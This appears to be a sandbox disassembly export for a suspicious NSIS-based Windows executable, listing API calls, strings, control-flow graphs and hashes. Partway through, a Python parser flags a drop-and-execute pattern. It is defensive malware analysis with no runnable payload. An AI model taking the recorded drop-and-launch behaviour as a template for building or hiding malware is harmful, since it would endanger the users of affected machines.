                                • Instruction Fuzzy Hash: 17F16571D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A86CF44
                                APIs
                                • GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                • LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: AddressHandleLibraryLoadModuleProc
                                • String ID:
                                • API String ID: 310444273-0
                                • Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
                                • Instruction ID: d69b72dbe4010a9b48e4a262f362438d38f190b8a9031efe6831075815a54aa0
                                • Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
                                • Instruction Fuzzy Hash: 5DE08C32A04610BBD3215B20AE0896B73A8EED9B403004C7EF615F6251D734AC11DBBA

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 106 403526-40353e call 405cff 109 403540-403550 call 40593b 106->109 110 403552-403579 call 4058c4 106->110 119 40359c-4035c5 call 4037ef call 4055b1 109->119 115 403591-403597 lstrcatA 110->115 116 40357b-40358c call 4058c4 110->116 115->119 116->115 124 4035cb-4035d0 119->124 125 40364c-403654 call 4055b1 119->125 124->125 126 4035d2-4035f6 call 4058c4 124->126 131 403662-403687 LoadImageA 125->131 132 403656-40365d call 4059ff 125->132 126->125 133 4035f8-4035fa 126->133 135 403716-40371e call 40140b 131->135 136 40368d-4036c3 RegisterClassA 131->136 132->131 137 40360b-403617 lstrlenA 133->137 138 4035fc-403609 call 4054fb 133->138 150 403720-403723 135->150 151 403728-403733 call 4037ef 135->151 139 4037e5 136->139 140 4036c9-403711 SystemParametersInfoA CreateWindowExA 136->140 144 403619-403627 lstrcmpiA 137->144 145 40363f-403647 call 4054d0 call 4059dd 137->145 138->137 142 4037e7-4037ee 139->142 140->135 144->145 149 403629-403633 GetFileAttributesA 144->149 145->125 154 403635-403637 149->154 155 403639-40363a call 405517 149->155 150->142 159 403739-403756 ShowWindow LoadLibraryA 151->159 160 4037bc-4037c4 call 404e4d 151->160 154->145 154->155 155->145 161 403758-40375d LoadLibraryA 159->161 162 40375f-403771 GetClassInfoA 159->162 168 4037c6-4037cc 160->168 169 4037de-4037e0 call 40140b 160->169 161->162 164 403773-403783 GetClassInfoA RegisterClassA 162->164 165 403789-4037ba DialogBoxParamA call 40140b call 403476 162->165 164->165 165->142 168->150 170 4037d2-4037d9 call 40140b 168->170 169->139 170->150
                                APIs
                                  • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                  • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                  • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                • lstrcatA.KERNEL32(1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403597
                                • lstrlenA.KERNEL32(open C:\Windows\temp\Edit9,?,?,?,open C:\Windows\temp\Edit9,00000000,C:\Windows\temp,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\G3izWAY3Fa.exe"), ref: 0040360C
                                • lstrcmpiA.KERNEL32(?,.exe), ref: 0040361F
                                • GetFileAttributesA.KERNEL32(open C:\Windows\temp\Edit9), ref: 0040362A
                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Windows\temp), ref: 00403673
                                  • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                • RegisterClassA.USER32 ref: 004036BA
                                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036D2
                                • CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040370B
                                • ShowWindow.USER32(00000005,00000000), ref: 00403741
                                • LoadLibraryA.KERNEL32(RichEd20), ref: 00403752
                                • LoadLibraryA.KERNEL32(RichEd32), ref: 0040375D
                                • GetClassInfoA.USER32(00000000,RichEdit20A,00423620), ref: 0040376D
                                • GetClassInfoA.USER32(00000000,RichEdit,00423620), ref: 0040377A
                                • RegisterClassA.USER32(00423620), ref: 00403783
                                • DialogBoxParamA.USER32(?,00000000,004038BC,00000000), ref: 004037A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                • String ID: 6B$"C:\Users\user\Desktop\G3izWAY3Fa.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Windows\temp$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$open C:\Windows\temp\Edit9
                                • API String ID: 914957316-3617224747
                                • Opcode ID: ca5c191d662c2f1331136733af7cd9fb3c1208b0aa80a7c8f6e1579a7abb4d19
                                • Instruction ID: 0f3f48bff709b167bb3a38cee6451da723a784a17f6d38f49bc0c0f1e25ee8dd
                                • Opcode Fuzzy Hash: ca5c191d662c2f1331136733af7cd9fb3c1208b0aa80a7c8f6e1579a7abb4d19
                                • Instruction Fuzzy Hash: 9261C5B1A04200BAD6206F659C45E3B3A6DE74474AF40453FF941B62E1D67D9E028B3E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 177 402c22-402c70 GetTickCount GetModuleFileNameA call 4056b4 180 402c72-402c77 177->180 181 402c7c-402caa call 4059dd call 405517 call 4059dd GetFileSize 177->181 182 402e54-402e58 180->182 189 402cb0 181->189 190 402d97-402da5 call 402bbe 181->190 191 402cb5-402ccc 189->191 197 402da7-402daa 190->197 198 402dfa-402dff 190->198 193 402cd0-402cd2 call 40304e 191->193 194 402cce 191->194 201 402cd7-402cd9 193->201 194->193 199 402dac-402dc4 call 403080 call 40304e 197->199 200 402dce-402df8 GlobalAlloc call 403080 call 402e5b 197->200 198->182 199->198 223 402dc6-402dcc 199->223 200->198 228 402e0b-402e1c 200->228 203 402e01-402e09 call 402bbe 201->203 204 402cdf-402ce6 201->204 203->198 207 402d62-402d66 204->207 208 402ce8-402cfc call 405675 204->208 212 402d70-402d76 207->212 213 402d68-402d6f call 402bbe 207->213 208->212 226 402cfe-402d05 208->226 219 402d85-402d8f 212->219 220 402d78-402d82 call 405d6b 212->220 213->212 219->191 227 402d95 219->227 220->219 223->198 223->200 226->212 232 402d07-402d0e 226->232 227->190 229 402e24-402e29 228->229 230 402e1e 228->230 233 402e2a-402e30 229->233 230->229 232->212 234 402d10-402d17 232->234 233->233 235 402e32-402e4d SetFilePointer call 405675 233->235 234->212 236 402d19-402d20 234->236 239 402e52 235->239 236->212 238 402d22-402d42 236->238 238->198 240 402d48-402d4c 238->240 239->182 241 402d54-402d5c 240->241 242 402d4e-402d52 240->242 241->212 243 402d5e-402d60 241->243 242->227 242->241 243->212
                                APIs
                                • GetTickCount.KERNEL32 ref: 00402C33
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\G3izWAY3Fa.exe,00000400), ref: 00402C4F
                                  • Part of subcall function 004056B4: GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 004056B8
                                  • Part of subcall function 004056B4: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G3izWAY3Fa.exe,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 00402C9B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$(pA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\G3izWAY3Fa.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                • API String ID: 4283519449-616736272
                                • Opcode ID: f0b155bb72d4673e8e2538c02c47e4f576f948850c8845f4e559d72db7119d93
                                • Instruction ID: bb8333a86194dcf573844375b596ab0c7c07cd824b72df89bd2f0bbec4532e5a
                                • Opcode Fuzzy Hash: f0b155bb72d4673e8e2538c02c47e4f576f948850c8845f4e559d72db7119d93
                                • Instruction Fuzzy Hash: 21511971A00214ABDB209F65DE89B9E7BB4EF04319F10403BF904B62D1D7BC9E458BAD

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 244 401734-401757 call 4029f6 call 40553d 249 401761-401773 call 4059dd call 4054d0 lstrcatA 244->249 250 401759-40175f call 4059dd 244->250 255 401778-40177e call 405c3f 249->255 250->255 260 401783-401787 255->260 261 401789-401793 call 405cd8 260->261 262 4017ba-4017bd 260->262 269 4017a5-4017b7 261->269 270 401795-4017a3 CompareFileTime 261->270 264 4017c5-4017e1 call 4056b4 262->264 265 4017bf-4017c0 call 405695 262->265 272 4017e3-4017e6 264->272 273 401859-401882 call 404d7b call 402e5b 264->273 265->264 269->262 270->269 274 4017e8-40182a call 4059dd * 2 call 4059ff call 4059dd call 40529e 272->274 275 40183b-401845 call 404d7b 272->275 285 401884-401888 273->285 286 40188a-401896 SetFileTime 273->286 274->260 307 401830-401831 274->307 287 40184e-401854 275->287 285->286 290 40189c-4018a7 CloseHandle 285->290 286->290 291 402894 287->291 294 40288b-40288e 290->294 295 4018ad-4018b0 290->295 293 402896-40289a 291->293 294->291 297 4018b2-4018c3 call 4059ff lstrcatA 295->297 298 4018c5-4018c8 call 4059ff 295->298 304 4018cd-402213 call 40529e 297->304 298->304 304->293 311 40265c-402663 304->311 307->287 310 401833-401834 307->310 310->275 311->294
                                APIs
                                • lstrcatA.KERNEL32(00000000,00000000,open,C:\Windows\temp,00000000,00000000,00000031), ref: 00401773
                                • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Windows\temp,00000000,00000000,00000031), ref: 0040179D
                                  • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,00423680,NSIS Error), ref: 004059EA
                                  • Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                  • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                  • Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                  • Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                  • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                  • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                  • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                • String ID: C:\Windows\temp$open$open C:\Windows\temp\Edit9
                                • API String ID: 1941528284-3341607499
                                • Opcode ID: 19fc4884e146a1ae1ba978f5a010e4346a4a04167c84060e6bd2cb96d6f55c18
                                • Instruction ID: 7896ef4f757b45501086316f909c91b804aeab5b8a53035332c5850d51b772f7
                                • Opcode Fuzzy Hash: 19fc4884e146a1ae1ba978f5a010e4346a4a04167c84060e6bd2cb96d6f55c18
                                • Instruction Fuzzy Hash: FA41C272900615BACF10BBA5DD46EAF3A79EF01329B20433BF515F11E1D63C4A419AAD

                                Control-flow Graph: entry block 00402e5b (rendered graph and edge list not recoverable in this export); the graph's blocks call GetTickCount, MulDiv, wsprintfA and WriteFile.
                                APIs
                                • GetTickCount.KERNEL32 ref: 00402EB9
                                • GetTickCount.KERNEL32 ref: 00402F3A
                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F67
                                • wsprintfA.USER32 ref: 00402F77
                                • WriteFile.KERNELBASE(00000000,00000000,0040F020,00000000,00000000), ref: 00402FA3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: same ten dump regions (0x400000 through 0x47E000) as listed for the first function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CountTick$FileWritewsprintf
                                • String ID: ... %d%%
                                • API String ID: 4209647438-2449383134
                                • Opcode ID: c92cbd3e3d4075a18ca6a835e36108bdbc166e0133a86f0c276232396de1e17b
                                • Instruction ID: 77f196e3f4de2b0f7ff2a56d5fa3bb7e3b28ee40e2402e388f788a2720e93e15
                                • Opcode Fuzzy Hash: c92cbd3e3d4075a18ca6a835e36108bdbc166e0133a86f0c276232396de1e17b
                                • Instruction Fuzzy Hash: F151917190121A9BCF10CF55DA48AAF7B78AF04795F10413BF810B72C0D7B89E50DBAA

                                Control-flow Graph: entry block 004015b3 (rendered graph and edge list not recoverable in this export); the graph's blocks call CreateDirectoryA, GetLastError, GetFileAttributesA and SetCurrentDirectoryA.
                                APIs
                                  • Part of subcall function 00405564: CharNextA.USER32(00405316,?,00421880,00000000,004055C8,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405572
                                  • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405577
                                  • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405586
                                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Windows\temp,00000000,00000000,000000F0), ref: 00401622
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: same ten dump regions (0x400000 through 0x47E000) as listed for the first function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                • String ID: C:\Windows\temp
                                • API String ID: 3751793516-823764690
                                • Opcode ID: c26435dd92f2a1108dda5f18212d644254b55bfd3cfdadd86ae1b21390b81dbb
                                • Instruction ID: ffaaac8e814952d4dd163c137c14166a37b00a477d69e33f5cc6849720afcf5a
                                • Opcode Fuzzy Hash: c26435dd92f2a1108dda5f18212d644254b55bfd3cfdadd86ae1b21390b81dbb
                                • Instruction Fuzzy Hash: 86010831908180ABDB116F795D44D6F27B0DA52365728473BF491B22E2C23C4942962E

                                Control-flow Graph: entry block 004056e3 (rendered graph and edge list not recoverable in this export); the graph's blocks call GetTickCount and GetTempFileNameA.
                                APIs
                                • GetTickCount.KERNEL32 ref: 004056F6
                                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405710
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: same ten dump regions (0x400000 through 0x47E000) as listed for the first function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                • API String ID: 1716503409-2753553320
                                • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                • Instruction ID: 090c9869d25c952b380026dfe3028592f3e254e5657c021594612e0629f183dd
                                • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                • Instruction Fuzzy Hash: AFF0A736348204B7D7104F55EC04B9B7F5DDF91750F14C027F944DA1C0D6B1995597A5
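
The function records above are the Joe Sandbox IDA plugin's text export; the report does not describe how to consume them. As an added example (not part of the report and not Joe Sandbox code), the Python below parses a constructed excerpt of two of the records above into structured objects: it pulls each call site (API, module, arguments, `ref:` address, and whether the call sits in a subcalled function), splits the `$`-joined `String ID` field, decodes the DWORD argument shown for GetTempFileNameA as little-endian ASCII (0061736E reads as the prefix "nsa", which also appears in that record's String ID; reading it that way is an interpretation of the export), and flags records whose strings pair the ShellExecute verb `open` with a path under `C:\Windows`, the drop-and-execute pattern visible in the 00401734 record. The record and field names, the regexes (which match only the line shapes seen on this page) and the flagging heuristic are assumptions of this example.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed excerpt: two function records in the layout of the report
# above (API lines ending in "ref: <addr>", then the Similarity fields),
# trimmed to the lines this parser consumes. Not the complete report.
SAMPLE = r"""
APIs
• lstrcatA.KERNEL32(00000000,00000000,open,C:\Windows\temp,00000000,00000000,00000031), ref: 00401773
• CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Windows\temp,00000000,00000000,00000031), ref: 0040179D
  • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,00423680,NSIS Error), ref: 004059EA
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Windows\temp$open$open C:\Windows\temp\Edit9
• API String ID: 1941528284-3341607499
• Opcode ID: 19fc4884e146a1ae1ba978f5a010e4346a4a04167c84060e6bd2cb96d6f55c18

APIs
• GetTickCount.KERNEL32 ref: 004056F6
• GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405710
Similarity
• API ID: CountFileNameTempTick
• String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-2753553320
• Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
"""

# One call-site line: optional "Part of subcall function XXXXXXXX:" prefix,
# Api.MODULE, optional (args), then the call-site address after "ref:".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subfn>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# One "• Key: value" metadata line (API ID, String ID, Opcode ID, ...).
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                 # call-site address from "ref:"
    subfn: Optional[str]     # set when the call sits in a subcalled function


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    @property
    def opcode_id(self) -> Optional[str]:
        return self.fields.get("Opcode ID")

    def strings(self) -> List[str]:
        # String ID is a "$"-joined list of the strings the function references
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    def direct_apis(self) -> set:
        return {c.api for c in self.calls if c.subfn is None}


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":          # each record's API table opens a new record
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            cur.calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                     m.group("ref"), m.group("subfn")))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m.group("key")] = m.group("val")
    return records


def dword_as_ascii(hex_dword: str) -> str:
    """Read a hex DWORD argument as the little-endian ASCII it spells."""
    return bytes.fromhex(hex_dword)[::-1].rstrip(b"\x00").decode("ascii", "replace")


def drop_and_execute_candidates(records: List[FunctionRecord]) -> List[tuple]:
    """Heuristic (assumption of this example): a record whose strings carry the
    ShellExecute verb "open" next to a path under C:\\Windows is staging a
    payload in a system directory and launching it."""
    hits = []
    for r in records:
        strs = r.strings()
        if any(s.lower() == "open" for s in strs):
            paths = [s for s in strs if s.lower().startswith("c:\\windows")]
            if paths:
                hits.append((r.opcode_id, paths))
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r.opcode_id[:12], sorted(r.direct_apis()), r.strings())
    print("drop-and-execute candidates:", drop_and_execute_candidates(recs))
    print("GetTempFileNameA prefix:", dword_as_ascii("0061736E"))
```

Run it on a saved copy of the report text instead of `SAMPLE` to get the same objects for every function; the `Opcode ID` is the only stable per-function key in this export, so it is what the flagging helper returns. Subcall lines are kept but excluded from `direct_apis()` so that imports attributed to NSIS helper routines (lstrcpynA, the `NSIS Error` string) do not pollute the per-function API set.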

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                  • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                  • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                  • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004030B8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: same ten dump regions (0x400000 through 0x47E000) as listed for the first function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Char$Next$CreateDirectoryPrev
                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 4115351271-3283962145
                                • Opcode ID: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                • Instruction ID: 14cf73edb083f9294524d0cb591bdba299ebaa8e37fda96f2dae1f3ab35ccfa6
                                • Opcode Fuzzy Hash: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                • Instruction Fuzzy Hash: 95D0C92160BD3032D66136263D0AFDF155C8F5236EFA1447BF809B61CA5B6C6A8219FF

                                Control-flow Graph: entry block 004063dd (rendered graph and edge list not recoverable in this export); the graph's blocks call GlobalAlloc and GlobalFree.
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: same ten dump regions (0x400000 through 0x47E000) as listed for the first function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                • Instruction ID: 95af8839098f806f541805b71f16133a603fad5641f47eebb8f014e75b9041d1
                                • Opcode Fuzzy Hash: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                • Instruction Fuzzy Hash: 58A13371D00229CBDF28CFA8C8447ADBBB1FF44305F25856AD856BB281D7789A86DF44

